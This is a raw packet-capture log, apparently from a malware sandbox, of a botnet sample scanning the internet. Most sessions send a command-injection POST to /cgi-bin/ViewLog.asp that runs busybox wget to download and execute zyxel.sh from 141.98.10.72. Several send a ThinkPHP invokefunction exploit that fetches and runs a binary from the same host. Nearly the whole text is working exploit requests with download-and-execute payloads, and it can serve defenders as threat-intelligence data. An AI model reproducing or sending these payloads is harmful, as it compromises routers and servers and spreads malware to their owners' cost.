                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:24.311077118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:46.838308096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      973192.168.2.154500431.136.245.978080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.487741947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:04.183409929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.527381897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:08.439291000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:13.815243006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:24.566791058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:46.838213921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      974192.168.2.155320494.123.141.1388080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.513370037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      975192.168.2.153563831.200.122.2428080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:03.515192986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      976192.168.2.1560010112.186.20.3880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:05.727047920 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      977192.168.2.1556418112.127.183.25380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:05.847532988 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:06.208091021 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:32:29 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      978192.168.2.156076231.136.10.308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.025470018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:06.711342096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:08.055447102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:10.743248940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119199038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:26.870764971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:48.886240959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      979192.168.2.155547862.29.6.1558080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.042203903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      980192.168.2.153555294.121.117.1028080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.042834044 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      981192.168.2.155014494.123.188.938080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.043837070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      982192.168.2.1546424112.90.95.7380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.192446947 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:06.575251102 CET294INHTTP/1.1 400 Bad Request
                                                      Server: openresty
                                                      Date: Wed, 14 Feb 2024 08:31:06 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 145
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center></center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      983192.168.2.153668494.121.125.2128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.290883064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      984192.168.2.154152694.121.56.328080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.291450024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      985192.168.2.154951494.120.174.378080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.292551994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      986192.168.2.155305694.121.217.2338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.538546085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      987192.168.2.155879494.120.245.108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:31:06.538817883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
